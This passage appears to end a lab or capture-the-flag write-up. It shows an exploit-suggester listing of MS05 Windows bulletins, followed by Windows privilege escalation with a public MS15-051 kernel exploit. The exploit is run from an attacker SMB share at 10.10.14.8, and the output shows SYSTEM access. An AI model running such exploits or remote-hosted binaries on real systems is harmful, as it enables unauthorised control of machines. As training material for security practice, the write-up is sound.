[E] MS05-035: Vulnerability in Microsoft Word Could Allow Remote Code Execution (903234) - Critical
[E] MS05-034: Cumulative Security Update for ISA Server 2000 (899753) - Critical
[E] MS05-033: Vulnerabilities in Telnet Client Could Allow Remote Code Execution (896428) - Important
[E] MS05-032: Vulnerability in Microsoft Agent Could Allow Spoofing (890046) - Important
[E] MS05-031: Vulnerability in Step-by-Step Interactive Training Could Allow Remote Code Execution (898458) - Critical
[E] MS05-030: Cumulative Security Update for Outlook Express (897715) - Critical
[E] MS05-029: Vulnerability in Microsoft Outlook Web Access for Exchange Server 5.5 Could Allow Cross-Site Scripting (895179) - Important
[E] MS05-028: Vulnerability in WebClient Service Could Allow Remote Code Execution (896426) - Important
[E] MS05-027: Vulnerability in Server Message Block Could Allow Remote Code Execution (896422) - Critical
[E] MS05-026: Vulnerability in HTML Help Could Allow Remote Code Execution (896358) - Critical
[E] MS05-025: Cumulative Security Update for Internet Explorer (883939) - Critical
[E] MS05-024: Vulnerability in Web View Could Allow Remote Code Execution (894320) - Important
[E] MS05-023: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (890169) - Critical
[E] MS05-022: Vulnerability in MSN Messenger Could Allow Remote Code Execution (896597) - Critical
[E] MS05-021: Vulnerability in Exchange Server Could Allow Remote Code Execution (894549) - Critical
[E] MS05-020: Cumulative Security Update for Internet Explorer (890923) - Critical
[E] MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066) - Critical
[E] MS05-018: Vulnerability in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859) - Important
[E] MS05-017: Vulnerability in Message Queuing Could Allow Code Execution (892944) - Critical
[E] MS05-016: Vulnerability in Windows Shell that Could Allow Remote Code Execution (893086) - Critical
[E] MS05-015: Vulnerability in Hyperlink Object Library Could Allow Remote Code Execution (890047) - Critical
[E] MS05-014: Cumulative Security Update for Internet Explorer (867282) - Critical
[E] MS05-013: Vulnerability in the DHTML Editing ActiveX Control Could Allow Remote Code Execution (891781) - Critical
[E] MS05-012: Vulnerability in OLE and COM Could Allow Remote Code Execution (873333) - Critical
[E] MS05-011: Vulnerability in Server Message Block Could Allow Remote Code Execution (885250) - Critical
[E] MS05-010: Vulnerability in the License Logging Service Could Allow Code Execution (885834) - Critical
[E] MS05-008: Vulnerability in Windows Shell Could Allow Remote Code Execution (890047) - Critical
[E] MS05-007: Vulnerability in Windows Could Allow Information Disclosure (888302) - Low
[E] MS05-006: Vulnerability in Windows SharePoint Services and SharePoint Team Services Could Allow Cross-Site Scripting (887981) - Moderate
[E] MS05-005: Vulnerability in Microsoft Office XP Could Allow Remote Code Execution (873352) - Important
[E] MS05-004: Vulnerability in ASP.NET Could Allow Information Disclosure (887219) - Important
[E] MS05-003: Vulnerability in the Indexing Service Could Allow Remote Code Execution (871250) - Important
[E] MS05-002: Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711) - Critical
[E] MS05-001: Vulnerability in HTML Help Could Allow Remote Code Execution (890175) - Critical
[*] done
Abuse MS15-051
I chose MS15-051, or CVE-2015-1701, I used the exploit found here: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
1
2
3
4
5
6
c:\windows\system32\inetsrv>\\10.10.14.8\kali\ms15-051.exe "whoami"
\\10.10.14.8\kali\ms15-051.exe "whoami"
[#] ms15-051 fixed by zzzZZZ...
[#] usage: ms15-051.exe cmd
[!] The account already has System privileges
nt authority\system
Good! we are now system!
This post is licensed under CC BY 4.0 by the author.